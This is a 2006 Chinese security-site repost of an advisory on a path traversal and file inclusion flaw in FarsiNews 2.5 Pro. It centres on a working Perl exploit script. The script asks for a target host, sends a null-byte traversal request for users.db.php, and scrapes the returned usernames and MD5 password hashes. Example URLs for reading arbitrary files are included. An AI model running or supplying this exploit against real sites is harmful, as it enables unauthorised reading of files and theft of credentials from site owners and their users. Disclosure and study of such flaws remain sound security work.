联系站长
加入收藏
会员登陆
 您的位置: 情长在线 >> 文章文献 >> Exploit/code >> [专题]Exploit/code >> By 情长在线(F.N.S.T)
   □  FarsiNews Remote File Inclusion    3星级
FarsiNews Remote File Inclusion
[作者:佚名    转贴自:Internet    点击数:    更新时间:2006-3-25    文章录入:一生情长]
【字体:

FarsiNews Remote File Inclusion
 
Summary
"FarsiNews is a News Publishing System"

Improper user input allows attackers to include arbitrary file .
 
Credit:
The information has been provided by hessamx. 
 
Details
Vulnerable Systems:
 * FarsiNews version 2.5 Pro and prior

Exploit:
#!/usr/bin/perl
# << HESSAM-X >>
# FarsiNews 2.5Pro Exploi
# Exploit by Hessam-x (www.hessamx.net)
#Iran Hackerz Security Team
#WebSite: www.hackerz.ir
#
# Summery
# Name : FarsiNews [www.farsinewsteam.com]
# version : 2.5Pro
######################################################
# in FarsiNews if you change the archive value :
# http://localhost/index.php?archive=hamid
# see :
# Warning: file([PATH]/data/archives/hamid.news.arch.php):
# failed to open stream: No such file or directory in [PATH]\inc\shows.inc.php on line 642
# Warning: file([PATH]/data/archives/hamid.comments.arch.php):
# failed to open stream: No such file or directory in [PATH]\inc\shows.inc.php on line 686
# ...[and many other error]
# it means that shows.inc.php try to open '/archives/hamid.news.arch.php' (and also 'hamid.comments.arch.php') to read it's data .
# we can change the archive value to '/../users.db.php%00' to see all username and password .
# Exploit :
# http://localhost/index.php?archive=/../users.db.php%00
# http://localhost/Farsi1/index.php?archive=/../[file-to-read]%00
# F0und by hamid
use LWP::Simple;

print "-------------------------------------------\n";
print "= Farsinews 2.5Pro =\n";
print "= By Hessam-x - www.hackerz.ir =\n";
print "-------------------------------------------\n\n";

       
        print "Target(www.example.com)\> ";
        chomp($targ = <STDIN>);
       
        print "Path: (/fn25/)\>";
        chomp($path=<STDIN>);
       
$url = "index.php?archive=/../users.db.php%00";
$page = get("http://".$targ.$path.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $targ\n";

$page =~ m/<img alt="(.*?)" src=/ && print "[+] Username: $1\n";
$page =~ m/style="border: none;" align="right" \/>(.*?)<\/font>/ && print "[+] MD5 Password: $1\n";

print "[-] Unable to retrieve User ID\n" if(!$1);
#EoF
 
  • 上一篇文章:Apple Mac OS X File Rewrites and Privilege Escalation Exploit
  • 下一篇文章:(MS06-007)IGMP v3 DoS Exploit
    		•
    发表评论   □ 告诉好友   □ 打印此文  □ 关闭窗口
     最新10篇热点文章
    SQL SERVER2000安全解决方…[206]
    Linux集群在银行信息化中的…[210]
    巧用Linux2.6内核新功能配…[313]
    Linux DHCP网络故障排除事…[158]
    手把手教您配置Liunx目录服…[389]
    Linux下安装和使用杀毒软件…[263]
    (MS06-007)IGMP v3 DoS Ex…[256]
    FarsiNews Remote File In…[158]
    Apple Mac OS X File Rewr…[189]
    BomberClone Buffer Overf…[267]
    		 
     最新10篇推荐文章
    手把手教您配置Liunx目录服…[03-25]
    Linux下安装和使用杀毒软件…[03-25]
    (MS06-007)IGMP v3 DoS Ex…[03-25]
    BomberClone Buffer Overf…[03-25]
    vBulletin ImpEx模块远程文…[03-24]
    网络安全论文专题[03-23]
    服务器、网络安全解决方案…[03-23]
    服务器常见故障的诊断与解…[02-26]
    探寻适合小型企业的网络安…[02-26]
    交换机配置中的安全性[02-26]
    		 
     相 关 文 章
      ◇  网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
     设为首页  加入收藏  关于本站  免费服务  广告服务   归档中心   站点地图  版权申明  联系站长  友情链接
    Copyright© 2001-2005 F.N.S.T Fineacer.Org .All Rights Reserved ICP备案:粤ICP备05002156号